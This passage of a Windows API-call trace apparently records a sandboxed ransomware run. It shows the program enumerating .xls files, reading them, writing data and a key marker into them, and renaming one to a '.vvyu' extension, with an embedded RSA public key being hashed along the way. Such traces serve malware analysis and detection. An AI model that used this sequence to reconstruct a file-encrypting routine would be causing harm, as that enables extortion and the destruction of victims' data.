Flags=0x0, Size=0x64) returned 0x6fab90 [0191.967] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0191.967] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0191.967] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0191.967] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0191.967] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a08 [0191.967] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0191.967] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0191.967] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0191.967] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39cd0 [0191.967] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0191.967] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0191.967] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0191.967] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0191.967] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0191.967] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0191.968] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0191.968] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0191.968] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c70 [0191.968] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0191.968] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0191.968] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0191.968] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0191.968] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0191.968] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0191.968] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0191.968] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39c88 [0191.968] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0191.968] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0191.968] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0191.968] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c58 [0191.968] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0191.968] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39ce8 [0191.968] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0191.968] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0191.968] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0191.968] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39cb8 [0191.968] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0191.968] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ca0 [0191.969] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0191.969] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39d00 [0191.969] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ca0 | out: hHeap=0x6a0000) returned 1 [0191.969] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39ca0 [0191.969] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39cb8 | out: hHeap=0x6a0000) returned 1 [0191.969] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0191.969] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0191.969] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0191.969] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0191.969] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27b58 [0191.969] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c70 | out: hHeap=0x6a0000) returned 1 [0191.969] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39c70 [0191.969] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0191.969] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0191.969] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39cd0 | out: hHeap=0x6a0000) returned 1 [0191.969] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0191.969] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d00 | out: hHeap=0x6a0000) returned 1 [0191.969] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0191.969] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0191.969] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0191.969] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0191.969] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0191.969] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c70 | out: hHeap=0x6a0000) returned 1 [0191.969] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0191.970] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0191.970] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0191.970] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0191.970] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea920 | out: hHeap=0x6a0000) returned 1 [0191.971] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0191.971] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0191.971] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0191.972] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0191.972] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0191.972] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0191.972] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0191.972] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0191.972] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ca0 | out: hHeap=0x6a0000) returned 1 [0191.973] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0191.973] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ce8 | out: hHeap=0x6a0000) returned 1 [0191.973] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0191.973] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c88 | out: hHeap=0x6a0000) returned 1 [0191.973] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c58 | out: hHeap=0x6a0000) returned 1 [0191.973] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0191.973] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0191.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0191.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c40 | out: hHeap=0x6a0000) returned 1 [0191.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d307a8 | out: hHeap=0x6a0000) returned 1 [0191.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0191.975] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0191.975] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0191.975] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0191.975] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0191.975] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0191.975] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0191.976] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0191.976] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0191.976] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0191.977] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0191.977] WriteFile (in: hFile=0x584, lpBuffer=0x2d45778*, nNumberOfBytesToWrite=0x48b7, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d45778*, lpNumberOfBytesWritten=0x30ffb14*=0x48b7, lpOverlapped=0x0) returned 1 [0191.977] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0191.978] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x48bc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.978] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0191.978] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0191.978] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.978] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0191.979] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0191.979] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0191.979] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0191.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.980] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0191.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0191.980] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0191.980] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0191.980] CloseHandle (hObject=0x584) returned 1 [0191.982] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0191.982] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x880) returned 0x2d154b0 [0191.982] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0191.982] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\PeBfuwtoR 4\\31Pg.xls" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\pebfuwtor 4\\31pg.xls"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\PeBfuwtoR 4\\31Pg.xls.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\pebfuwtor 4\\31pg.xls.vvyu")) returned 1 [0191.984] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0191.984] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0191.984] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0191.987] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x794008 | out: hHeap=0x6a0000) returned 1 [0191.987] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6b340d0, ftCreationTime.dwHighDateTime=0x1d8a2e2, ftLastAccessTime.dwLowDateTime=0x47172d30, ftLastAccessTime.dwHighDateTime=0x1d8a3bc, ftLastWriteTime.dwLowDateTime=0x47172d30, ftLastWriteTime.dwHighDateTime=0x1d8a3bc, nFileSizeHigh=0x0, nFileSizeLow=0xdab2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5tWeVqoRi-de0YRYB.xls", cAlternateFileName="5TWEVQ~1.XLS")) returned 1 [0191.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x794008 [0191.988] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.988] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\PeBfuwtoR 4\\5tWeVqoRi-de0YRYB.xls") returned=".xls" [0191.988] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\PeBfuwtoR 4\\5tWeVqoRi-de0YRYB.xls" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\pebfuwtor 4\\5twevqori-de0yryb.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0191.988] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=55986) returned 1 [0191.988] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0191.991] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xda8c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.991] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0191.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0191.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0191.993] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0191.993] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0xdab2, lpOverlapped=0x0) returned 1 [0191.995] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0191.995] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0191.995] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0191.995] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0191.995] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea920) returned 1 [0191.996] CryptCreateHash (in: hProv=0x6ea920, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0191.996] CryptHashData (hHash=0x2cbfa90, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0191.996] CryptGetHashParam (in: hHash=0x2cbfa90, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0191.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0191.996] CryptGetHashParam (in: hHash=0x2cbfa90, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0191.996] GetLastError () returned 0x0 [0191.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0191.996] GetLastError () returned 0x0 [0191.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0191.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0191.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0191.997] CryptDestroyHash (hHash=0x2cbfa90) returned 1 [0191.997] CryptReleaseContext (hProv=0x6ea920, dwFlags=0x0) returned 1 [0191.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0191.997] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0191.997] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0191.997] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0191.997] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0191.998] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0191.998] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0191.998] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xdab0) returned 0x2d45778 [0191.998] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0191.999] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0191.999] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0191.999] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0191.999] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0191.999] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0191.999] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d307a8 [0191.999] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c40 [0191.999] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d41920 [0191.999] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c58 [0191.999] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c88 [0191.999] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ce8 [0191.999] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ca0 [0191.999] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0191.999] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0191.999] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0191.999] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0191.999] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c88 | out: hHeap=0x6a0000) returned 1 [0191.999] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ca0 | out: hHeap=0x6a0000) returned 1 [0191.999] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ce8 | out: hHeap=0x6a0000) returned 1 [0192.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0192.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.000] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ce8 [0192.000] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0192.000] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39ca0 [0192.000] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0192.000] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39c88 [0192.000] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0192.000] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0192.000] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0192.000] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0192.000] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0192.000] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0192.000] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0192.001] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0192.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, 